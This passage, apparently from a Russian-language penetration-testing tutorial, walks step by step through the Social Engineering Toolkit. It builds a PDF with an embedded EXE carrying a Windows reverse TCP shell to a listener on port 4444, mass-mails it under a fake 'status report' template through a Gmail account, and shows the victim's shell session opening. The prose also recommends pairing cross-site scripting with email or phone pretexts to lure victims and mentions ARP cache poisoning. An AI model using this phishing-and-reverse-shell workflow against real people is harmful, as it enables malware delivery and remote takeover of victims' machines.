first have to create your own payload, you can easily do this by using
the "Create a FileFormat Payload", then from there launch the mass
e-mail attack.
 
1. Perform a Mass Email Attack
2. Create a Social-Engineering Payload
3. Return to Main Menu.
 
Enter your choice: 1
Do you want to create a social-engineering payload now yes or no: yes
 
Select the file format exploit you want.
 
The default is the PDF embedded EXE.
 
 
***** METASPLOIT PAYLOADS *****
 
 
1. Adobe Collab.collectEmailInfo Buffer Overflow
2. Adobe Collab.getIcon Buffer Overflow
3. Adobe JBIG2Decode Memory Corruption Exploit
4. Adobe PDF Embedded EXE Social Engineering
5. Adobe util.printf() Buffer Overflow
6. Custom EXE to VBA (sent via RAR)
 
 
Enter the number you want (press enter for default): 4
You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.
 
1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse Shell
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
 
Enter the payload you want: 1
Enter the IP address you want the payload to connect back to you on: 10.211.55.130
Enter the port you want to connect back on: 4444
Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Reading in 'src/msf_attacks/form.pdf'...
[*] Parseing 'src/msf_attacks/form.pdf'...
[*] Parseing Successfull.
[*] Using 'windows/shell_reverse_tcp' as payload...
[*] Creating 'template.pdf' file...
[*] Generated output file /home/relik/SET/src/program_junk/template.pdf
 
 
   Payload creation complete. All payloads get sent to the src/msf_attacks/template.pdf directory
 
Press enter to return to the prior menu.
 
 
As an added bonus, use the file-format creator in SET to create your attachment.
 
 
[-] A previous created PDF attack by SET was detected..Do you want to use the PDF as a payload? [-]
 
 
Enter your answer yes or no: yes
 
Social Engineering Toolkit Mass E-Mailer
 
There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
 
What do you want to do:
 
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
 
Enter your choice: 2
 
Which template do you want to use?
 
1. Strange and Suspicious Computer Behavior
2. Email to SysAdmins, can't open PDF
3. Please Open up this Status Report
4. Enter your own message
 
Enter your choice: 3
 
The mass emailer will allow you to send emails to multiple
individuals in a list. The format is simple, it will email
based off of a line. So it should look like the following:
 
john.doe@ihazemail.com
jane.doe@ihazemail.com
wayne.doe@ihazemail.com
 
This will continue through until it reaches the end of the
file. You will need to specify where the file is, for example
if its in the SET folder, just specify filename.txt (or whatever
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
 
Enter the path to the file to import into SET: email.txt
Enter your GMAIL email address: relik@gmail.com
Enter your password for gmail (it will not be displayed back to you):
Sent e-mail number: 1
Sent e-mail number: 2
Sent e-mail number: 3
Sent e-mail number: 4
 
 
SET has finished deliverying the emails. Do you want to setup a listener yes or no: yes
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Теперь, когда все письма были отправлены, а наш компьютер ждет подключение, мы ждем когда на другом конце откроют вложенный в письмо pdf файл.

status

Когда пользователь откроет файл, он увидит следующее.

page

На нашем Back|Track 4 ожидающим соединение произойдет следующее.

[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (10.211.55.130:4444 -> 10.211.55.140:1079)
 
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
 
C:\Documents and Settings\Administrator\Desktop>

Еще одним вариантом атаки, наравне с электронной почтой, может быть поддельный вебсайт с полезной нагрузкой Metasploit, после визита на такой сайт будет запущен Java Applet «подписанный» Microsoft, если пользователь примет выполнение апплета, сработает полезная нагрузка. Другой вариант, если мы находимся внутри сети, можно «отравить» ARP кэш. Мы будем использовать этот сценарий в примере, приведенном ниже. Однако, несмотря на вариант отравление ARP кэша , я рекомендовал бы сочетание межсайтового скриптинга с сообщениями по электронной почте или телефону, чтобы заставить жертву пойти на ваш сайт.

root@bt4:/home/relik/SET# ./set
 
 
    [---]       The Social Engineering Toolkit (SET)     [---]
    [---] Written by David Kennedy (ReL1K) @ SecureState [---]
    [---]               Version: 0.1 Alpha               [---]
 
Welcome to the Social Engineering Toolkit, your one-stop shop
for all of your social engineering needs.
 
Select from the menu on what you would like to do:
 
1. Automatic E-Mail Attacks
2. Website Attacks
3. Update the Metasploit Framework
4. Help
5. Exit the Toolkit
 
Enter your choice: 2
 
The Social Engineering Toolkit "Web Attack" will create a
fake "professional" looking website for you with malicious